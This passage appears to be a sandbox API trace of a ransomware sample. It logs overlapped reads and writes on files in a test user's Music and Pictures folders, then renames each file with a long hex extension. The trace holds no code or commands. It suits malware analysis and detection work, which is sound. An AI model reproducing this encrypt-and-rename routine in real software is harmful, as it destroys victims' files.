lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.784] ReadFile (in: hFile=0x5a4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.785] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.787] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.788] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a", lpString2=".4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a.4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\-klD7FnnV0Wcc3teosZX.m4a.4B9730BD836F7B06112DDF6644EC695F1CD9B9ED67B967E61E55191971E95A7F" [0167.788] GetProcessHeap () returned 0x270000 [0167.788] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x134) returned 0x4263448 [0167.788] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x4263448, Length=0x134, FileInformationClass=0xa) returned 0x0 [0167.790] CloseHandle (hObject=0x5a4) returned 1 [0167.791] GetProcessHeap () returned 0x270000 [0167.792] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.792] RtlInterlockedCompareExchange64 () returned 0x1 [0167.792] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.796] ReadFile (in: hFile=0x5a4, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.796] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.796] WriteFile (in: hFile=0x5a4, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0167.797] RtlInterlockedCompareExchange64 () returned 0x0 [0167.798] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.810] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.811] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3", lpString2=".0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3.0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\-ScN6EQhA.mp3.0B40EC970B2793A9062A668F43E3EA32F3D4C910F925141C72FCD32C9853C063" [0167.811] GetProcessHeap () returned 0x270000 [0167.811] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4263590 [0167.811] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x4263590, Length=0x132, FileInformationClass=0xa) returned 0x0 [0167.812] CloseHandle (hObject=0x304) returned 1 [0167.813] GetProcessHeap () returned 0x270000 [0167.814] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.814] RtlInterlockedCompareExchange64 () returned 0x1 [0167.815] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.818] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.818] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.820] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.821] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3", lpString2=".487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3.487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3.487DEBE31F42AD12E57C726822887ECBEF881641EF543C2ACD3E963785ECF645" [0167.821] GetProcessHeap () returned 0x270000 [0167.821] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12e) returned 0x4332098 [0167.821] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x4332098, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0167.822] CloseHandle (hObject=0x304) returned 1 [0167.823] GetProcessHeap () returned 0x270000 [0167.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.824] RtlInterlockedCompareExchange64 () returned 0x1 [0167.824] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 
1 [0167.827] ReadFile (in: hFile=0x304, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.828] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.830] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x74c20b8, ReturnLength=0x422f7cc) returned 0x0 [0167.831] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a", lpString2=".072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a.072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a.072CCBEC1BE984A01A064F39C2FE8AC1B8455398A7443991CAB0DE2EE3D1D06E" [0167.831] GetProcessHeap () returned 0x270000 [0167.831] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x43321d0 [0167.831] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x422f7bc, FileInformation=0x43321d0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.833] CloseHandle (hObject=0x304) returned 1 [0167.834] GetProcessHeap () returned 0x270000 [0167.835] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.835] RtlInterlockedCompareExchange64 () returned 0x1 [0167.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.838] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.839] RtlInterlockedCompareExchange64 () returned 0x0 [0167.839] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.424] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0168.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.432] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0168.441] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.617] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, 
lpOverlapped=0x7690008) returned 1 [0168.618] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.618] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.623] RtlInterlockedCompareExchange64 () returned 0x0 [0168.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.641] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.642] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.643] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.644] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png", lpString2=".8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png.8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png.8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527" [0168.644] GetProcessHeap () returned 0x270000 [0168.644] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14e) returned 0x42fbc80 [0168.644] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x42fbc80, Length=0x14e, FileInformationClass=0xa) returned 0x0 [0168.646] CloseHandle (hObject=0x5a4) returned 1 [0168.647] GetProcessHeap () returned 0x270000 [0168.648] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.648] RtlInterlockedCompareExchange64 () returned 0x1 [0168.648] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.651] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.653] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.654] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif", lpString2=".8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif.8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif.8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E" [0168.654] GetProcessHeap () returned 0x270000 [0168.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x750a170 [0168.655] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x750a170, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0168.656] CloseHandle (hObject=0x5a4) returned 1 [0168.657] GetProcessHeap () returned 0x270000 [0168.658] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.658] RtlInterlockedCompareExchange64 () returned 0x1 [0168.658] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.662] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.664] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.665] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, 
ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.667] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg", lpString2=".AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg.AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg.AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153" [0168.667] GetProcessHeap () returned 0x270000 [0168.667] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7421688 [0168.667] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x7421688, Length=0x168, FileInformationClass=0xa) returned 0x0 [0168.668] CloseHandle (hObject=0x5a4) returned 1 [0168.669] GetProcessHeap () returned 0x270000 [0168.671] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.671] RtlInterlockedCompareExchange64 () returned 0x1 [0168.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.675] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.676] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.676] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.677] RtlInterlockedCompareExchange64 () returned 0x0 [0168.677] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.691] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.693] RtlInterlockedCompareExchange64 () returned 0x0 [0168.693] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.705] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.706] RtlInterlockedCompareExchange64 () returned 0x0 [0168.706] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.737] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, 
ReturnLength=0x422f7cc | out: ObjectInformation=0x76900b8, ReturnLength=0x422f7cc) returned 0x0 [0168.738] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif", lpString2=".736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif.736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif.736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11" [0168.738] GetProcessHeap () returned 0x270000 [0168.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4258168 [0168.738] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4258168, Length=0x142, FileInformationClass=0xa) returned 0x0 [0168.739] CloseHandle (hObject=0x5b8) returned 1 [0169.007] GetProcessHeap () returned 0x270000 [0169.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0169.008] RtlInterlockedCompareExchange64 () returned 0x1 [0169.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.008] ReadFile (in: hFile=0x594, lpBuffer=0x752a588, nNumberOfBytesToRead=0x3400, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0169.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) 
returned 1 [0169.009] ReadFile (in: hFile=0x5a8, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0169.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.010] ReadFile (in: hFile=0x5c4, lpBuffer=0x757a838, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0169.010] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.010] ReadFile (in: hFile=0x5c8, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0169.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.011] ReadFile (in: hFile=0x5d0, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, 